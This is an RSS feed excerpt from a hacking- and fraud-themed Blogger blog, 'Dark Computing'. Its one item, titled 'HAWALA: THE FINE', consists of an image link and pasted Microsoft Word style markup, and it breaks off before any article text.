<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2217938988490451807</atom:id><lastBuildDate>Mon, 02 Sep 2024 03:06:39 +0000</lastBuildDate><category>Links</category><category>Tutorials</category><category>Malware</category><category>Downloads</category><category>Fraud</category><category>Hacking</category><category>Misc</category><category>Reviews</category><title>.:[ Dark Computing ]:.</title><description>Stepping away from your computer,&#xa;The door opens to a world full of idiots,&#xa;Block button is nowhere to be found</description><link>http://dark-computing.blogspot.com/</link><managingEditor>noreply@blogger.com (mango)</managingEditor><generator>Blogger</generator><openSearch:totalResults>17</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-8367723059844817040</guid><pubDate>Mon, 21 Feb 2011 15:54:00 +0000</pubDate><atom:updated>2011-02-21T07:59:50.363-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fraud</category><title>HAWALA: THE FINE</title><description>&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sDKZ46PylWfEm9si8eeWgONhdtS8jFcfJTNZm_JehuetMzllEwBXK6wVZT1BrUnyTE9gD-lq3jiS16JC_uxLkQ012ra8mWup4r5Hjn2bpubH_bpIJkTd4uIMO0tBi24TIBB9hvXeapc/s1600/Untitled.jpg&quot;&gt;&lt;img style=&quot;float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 320px; height: 294px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sDKZ46PylWfEm9si8eeWgONhdtS8jFcfJTNZm_JehuetMzllEwBXK6wVZT1BrUnyTE9gD-lq3jiS16JC_uxLkQ012ra8mWup4r5Hjn2bpubH_bpIJkTd4uIMO0tBi24TIBB9hvXeapc/s320/Untitled.jpg&quot; alt=&quot;&quot; id=&quot;BLOGGER_PHOTO_ID_5576172442151660578&quot; border=&quot;0&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-US&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val=&quot;Cambria Math&quot;&gt;    &lt;m:brkbin val=&quot;before&quot;&gt;    &lt;m:brkbinsub val=&quot;&amp;#45;-&quot;&gt;    &lt;m:smallfrac val=&quot;off&quot;&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val=&quot;0&quot;&gt;    &lt;m:rmargin val=&quot;0&quot;&gt;    &lt;m:defjc val=&quot;centerGroup&quot;&gt;    &lt;m:wrapindent val=&quot;1440&quot;&gt;    &lt;m:intlim val=&quot;subSup&quot;&gt;    &lt;m:narylim val=&quot;undOvr&quot;&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate=&quot;false&quot; defunhidewhenused=&quot;true&quot; defsemihidden=&quot;true&quot; defqformat=&quot;false&quot; defpriority=&quot;99&quot; latentstylecount=&quot;267&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;0&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Normal&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;heading 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 7&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 8&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;9&quot; qformat=&quot;true&quot; name=&quot;heading 9&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 7&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 8&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; name=&quot;toc 9&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;35&quot; qformat=&quot;true&quot; name=&quot;caption&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;10&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Title&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;1&quot; name=&quot;Default Paragraph Font&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;11&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Subtitle&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;22&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Strong&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;20&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Emphasis&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;59&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Table Grid&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Placeholder Text&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;1&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;No Spacing&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Revision&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;34&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;List Paragraph&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;29&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Quote&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;30&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Intense Quote&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 1&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 2&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 3&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 4&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 5&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;60&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Shading Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;61&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light List Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;62&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Light Grid Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;63&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 1 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;64&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Shading 2 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;65&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 1 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;66&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium List 2 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;67&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 1 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;68&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 2 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;69&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Medium Grid 3 Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;70&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Dark List Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;71&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Shading Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;72&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful List Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;73&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; name=&quot;Colorful Grid Accent 6&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;19&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Subtle Emphasis&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;21&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Intense Emphasis&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;31&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Subtle Reference&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;32&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Intense Reference&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;33&quot; semihidden=&quot;false&quot; unhidewhenused=&quot;false&quot; qformat=&quot;true&quot; name=&quot;Book Title&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;37&quot; name=&quot;Bibliography&quot;&gt;   &lt;w:lsdexception locked=&quot;false&quot; priority=&quot;39&quot; qformat=&quot;true&quot; name=&quot;TOC Heading&quot;&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:&quot;Table Normal&quot;;  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-priority:99;  mso-style-qformat:yes;  mso-style-parent:&quot;&quot;;  mso-padding-alt:0in 5.4pt 0in 5.4pt;  mso-para-margin-top:0in;  mso-para-margin-right:0in;  mso-para-margin-bottom:10.0pt;  mso-para-margin-left:0in;  line-height:115%;  mso-pagination:widow-orphan;  font-size:11.0pt;  font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;  mso-ascii-font-family:Calibri;  mso-ascii-theme-font:minor-latin;  mso-fareast-font-family:&quot;Times New Roman&quot;;  mso-fareast-theme-font:minor-fareast;  mso-hansi-font-family:Calibri;  mso-hansi-theme-font:minor-latin;  